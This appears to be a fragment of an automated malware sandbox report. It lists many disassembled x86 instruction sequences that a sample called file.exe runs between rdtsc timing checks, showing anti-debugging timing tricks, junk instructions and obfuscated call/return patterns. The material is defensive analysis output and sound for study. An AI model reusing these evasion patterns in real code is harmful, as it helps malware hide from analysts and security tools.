Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85388 second address: B853DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or dword ptr [ebp+122D33CBh], esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F08C0C91958h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e sub dword ptr [ebp+124677ACh], ebx 0x00000034 push 00000000h 0x00000036 mov bl, 56h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jng 00007F08C0C91958h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85637 second address: B85665 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F08C0CB453Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F08C0CB4534h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85665 second address: B85669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B865FE second address: B86609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F08C0CB4526h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B86609 second address: B8660F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8660F second address: B86613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B86613 second address: B86693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12461115h], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F08C0C91958h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F08C0C91958h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov eax, dword ptr [ebp+122D123Dh] 0x00000059 mov dword ptr [ebp+122DBA1Fh], ecx 0x0000005f push FFFFFFFFh 0x00000061 stc 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F08C0C91960h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B86693 second address: B866A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007F08C0CB4526h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B866A4 second address: B866AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B882EB second address: B882F9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B882F9 second address: B88390 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007F08C0C91969h 0x00000013 push ecx 0x00000014 call 00007F08C0C91969h 0x00000019 pop ebx 0x0000001a pop edi 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F08C0C91958h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 pushad 0x00000039 mov ebx, dword ptr [ebp+1244AFD7h] 0x0000003f mov ecx, ebx 0x00000041 popad 0x00000042 jmp 00007F08C0C9195Ch 0x00000047 push 00000000h 0x00000049 mov bh, al 0x0000004b add dword ptr [ebp+122D1F69h], eax 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jg 00007F08C0C91956h 0x0000005b jno 00007F08C0C91956h 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B874CA second address: B874CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B88390 second address: B88395 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8A227 second address: B8A2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 je 00007F08C0CB4526h 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F08C0CB4531h 0x00000016 ja 00007F08C0CB452Ch 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F08C0CB4528h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F08C0CB4528h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 0000001Ch 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 jno 00007F08C0CB4527h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F08C0CB4533h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8A2B8 second address: B8A2BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8FB22 second address: B8FB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B947C1 second address: B947C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B947C5 second address: B947CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B947CB second address: B947F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08C0C9195Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F08C0C91969h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9494D second address: B9496A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4535h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94AE0 second address: B94AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94AE6 second address: B94B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4538h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94B02 second address: B94B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F08C0C91956h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99562 second address: B9957F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F08C0CB4535h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9957F second address: B99585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99585 second address: B99589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99589 second address: B995A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jc 00007F08C0C91956h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B997C5 second address: B997CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B997CB second address: B997D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B997D0 second address: B99860 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08C0CB453Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d jp 00007F08C0CB4526h 0x00000013 jnc 00007F08C0CB4526h 0x00000019 popad 0x0000001a pop edi 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jnp 00007F08C0CB452Eh 0x00000025 jbe 00007F08C0CB4528h 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d mov eax, dword ptr [eax] 0x0000002f jng 00007F08C0CB453Dh 0x00000035 jmp 00007F08C0CB4537h 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e pushad 0x0000003f jmp 00007F08C0CB4536h 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F08C0CB4531h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99860 second address: B99864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99864 second address: 9D3E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jnp 00007F08C0CB452Bh 0x0000000e pushad 0x0000000f or ch, 0000003Bh 0x00000012 popad 0x00000013 push dword ptr [ebp+122D126Dh] 0x00000019 cld 0x0000001a call dword ptr [ebp+122D1FFEh] 0x00000020 pushad 0x00000021 jne 00007F08C0CB4527h 0x00000027 xor eax, eax 0x00000029 jnl 00007F08C0CB4527h 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 jno 00007F08C0CB452Ch 0x00000039 jmp 00007F08C0CB4539h 0x0000003e mov dword ptr [ebp+122D2EB9h], eax 0x00000044 pushad 0x00000045 sub dword ptr [ebp+122D33CBh], esi 0x0000004b add esi, dword ptr [ebp+122D2DB1h] 0x00000051 popad 0x00000052 mov esi, 0000003Ch 0x00000057 pushad 0x00000058 xor di, F3D0h 0x0000005d xor dword ptr [ebp+122D1C3Dh], edx 0x00000063 popad 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 sub dword ptr [ebp+122D1C52h], edx 0x0000006e lodsw 0x00000070 jmp 00007F08C0CB4535h 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jnp 00007F08C0CB4527h 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 jmp 00007F08C0CB452Fh 0x00000088 nop 0x00000089 pushad 0x0000008a push eax 0x0000008b jno 00007F08C0CB4526h 0x00000091 pop eax 0x00000092 push eax 0x00000093 push edx 0x00000094 jbe 00007F08C0CB4526h 0x0000009a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AAD0 second address: B9AAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0C9195Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AAE2 second address: B9AAE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AAE6 second address: B9AAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AAEC second address: B9AB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F08C0CB452Dh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AB03 second address: B9AB0D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F08C0C9195Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AB0D second address: B9AB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F08C0CB452Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AB25 second address: B9AB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AB2B second address: B9AB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F08C0CB4526h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AB3A second address: B9AB3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA0610 second address: BA061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F08C0CB4526h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA061B second address: BA063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0C91963h 0x00000008 ja 00007F08C0C91956h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FA2A second address: B9FA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FA2F second address: B9FA35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FA35 second address: B9FA3F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F08C0CB4526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FDE8 second address: B9FDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FF5E second address: B9FF73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4530h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7202 second address: BA7216 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007F08C0C91956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F08C0C9195Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77915 second address: B77984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F08C0CB4528h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edx 0x00000012 nop 0x00000013 pushad 0x00000014 jmp 00007F08C0CB4537h 0x00000019 or si, 5280h 0x0000001e popad 0x0000001f pushad 0x00000020 mov dword ptr [ebp+12467EBCh], ebx 0x00000026 mov dx, bx 0x00000029 popad 0x0000002a lea eax, dword ptr [ebp+1247767Ah] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F08C0CB4528h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov di, ax 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 je 00007F08C0CB4528h 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77EA8 second address: B77EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77EAC second address: B77EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F08C0CB4526h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77EBE second address: B77ED0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77ED0 second address: B77ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77ED6 second address: B77EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77EDA second address: 9D3E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push dword ptr [ebp+122D126Dh] 0x0000000f xor di, 7D00h 0x00000014 call dword ptr [ebp+122D1FFEh] 0x0000001a pushad 0x0000001b jne 00007F08C0CB4527h 0x00000021 xor eax, eax 0x00000023 jnl 00007F08C0CB4527h 0x00000029 mov edx, dword ptr [esp+28h] 0x0000002d jno 00007F08C0CB452Ch 0x00000033 jmp 00007F08C0CB4539h 0x00000038 mov dword ptr [ebp+122D2EB9h], eax 0x0000003e pushad 0x0000003f sub dword ptr [ebp+122D33CBh], esi 0x00000045 add esi, dword ptr [ebp+122D2DB1h] 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 pushad 0x00000052 xor di, F3D0h 0x00000057 xor dword ptr [ebp+122D1C3Dh], edx 0x0000005d popad 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 sub dword ptr [ebp+122D1C52h], edx 0x00000068 lodsw 0x0000006a jmp 00007F08C0CB4535h 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jnp 00007F08C0CB4527h 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d jmp 00007F08C0CB452Fh 0x00000082 nop 0x00000083 pushad 0x00000084 push eax 0x00000085 jno 00007F08C0CB4526h 0x0000008b pop eax 0x0000008c push eax 0x0000008d push edx 0x0000008e jbe 00007F08C0CB4526h 0x00000094 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7801D second address: B78022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78022 second address: B78062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d je 00007F08C0CB4540h 0x00000013 jo 00007F08C0CB453Ah 0x00000019 jmp 00007F08C0CB4534h 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push edi 0x00000024 pop edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78062 second address: B78067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78067 second address: B7807A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB452Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7807A second address: B780D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F08C0C9195Ah 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F08C0C91958h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c sub ecx, 137DA912h 0x00000032 call 00007F08C0C91959h 0x00000037 js 00007F08C0C91964h 0x0000003d push eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 push esi 0x00000042 pop esi 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B780D8 second address: B780F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007F08C0CB4526h 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B780F1 second address: B780F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B780F5 second address: B780FF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B780FF second address: B7811B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0C9195Dh 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7811B second address: B78120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7835A second address: B7835E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78437 second address: B7844A instructions: 0x00000000 rdtsc 0x00000002 js 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F08C0CB4526h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78586 second address: B7858A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7858A second address: B7858E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7858E second address: B785E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F08C0C91958h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov edx, 32F8C6D3h 0x00000027 push 00000004h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F08C0C91958h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D33A5h], esi 0x00000049 nop 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B785E7 second address: B785EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78A8D second address: B78A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78A91 second address: B78A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78A97 second address: B78A9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
